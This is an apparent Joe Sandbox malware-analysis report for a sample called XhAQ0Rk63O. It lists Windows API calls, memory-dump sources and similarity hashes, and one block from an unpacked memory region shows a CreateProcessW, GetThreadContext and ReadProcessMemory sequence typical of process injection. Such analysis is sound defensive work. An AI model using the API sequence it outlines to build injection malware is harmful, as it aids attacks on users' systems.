                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFile
                                                                                          • String ID:
                                                                                          • API String ID: 823142352-0
                                                                                          • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                          • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                          • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                          • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __lock_file_memset
                                                                                          • String ID:
                                                                                          • API String ID: 26237723-0
                                                                                          • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                          • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                          • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                          • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                          APIs
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          • __lock_file.LIBCMT ref: 00414EE4
                                                                                            • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                          • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                          • String ID:
                                                                                          • API String ID: 717694121-0
                                                                                          • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                          • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                          • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                          • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                          APIs
                                                                                          • TranslateMessage.USER32(?), ref: 004098F6
                                                                                          • DispatchMessageW.USER32(?), ref: 00409901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 1706434739-0
                                                                                          • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                          • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                          • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                          • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                          APIs
                                                                                          • TranslateMessage.USER32(?), ref: 004098F6
                                                                                          • DispatchMessageW.USER32(?), ref: 00409901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 1706434739-0
                                                                                          • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                          • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                          • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                          • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                          APIs
                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 040E550B
                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040E55A1
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040E55C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 2438371351-0
                                                                                          • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                          • Instruction ID: 3c11f01699059cdd787b519045bf9765a066da5a371ef1a1014e50996bb32620
                                                                                          • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                          • Instruction Fuzzy Hash: 1A12EE20E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A4E77A5F91CF5A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                          • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                          • Opcode Fuzzy Hash: 0d8ad4d875158e0120ed104e09085659f42b86f6d600f5d33fa38308f41241bf
                                                                                          • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 181713994-0
                                                                                          • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                          • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                          • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                          • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                          APIs
                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 10892065-0
                                                                                          • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                          • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                          • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                          • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                          APIs
                                                                                            • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                          • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$PointerWrite
                                                                                          • String ID:
                                                                                          • API String ID: 539440098-0
                                                                                          • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                          • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                          • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                          • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 181713994-0
                                                                                          • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                          • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                          • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                          • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wfsopen
                                                                                          • String ID:
                                                                                          • API String ID: 197181222-0
                                                                                          • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                          • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                          • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                          • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                          • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                          • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                          • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 040E5D61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1425973237.00000000040E3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040E3000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_40e3000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction ID: ef8a4ef5773a4d7433b6e9576cf483eb9d29b6479250e4ca25b403d22f1b47b3
                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction Fuzzy Hash: 40E0E67494410DEFDB00EFF4D94D6AE7FB4EF04301F100561FD01E2280D6309D608A62
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                          • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                          • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                          • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                          • SendMessageW.USER32 ref: 0047C2FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$State$LongProcWindow
                                                                                          • String ID: @GUI_DRAGID$F
                                                                                          • API String ID: 1562745308-4164748364
                                                                                          • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                          • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                          • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                          • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                          • API String ID: 0-3772701627
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                          • IsIconic.USER32(?), ref: 004375E1
                                                                                          • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                          • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                          • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                          • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 3778422247-2988720461
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0044621B
                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                          • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                          • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                          • _wcslen.LIBCMT ref: 0044639E
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • _wcsncpy.LIBCMT ref: 004463C7
                                                                                          • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
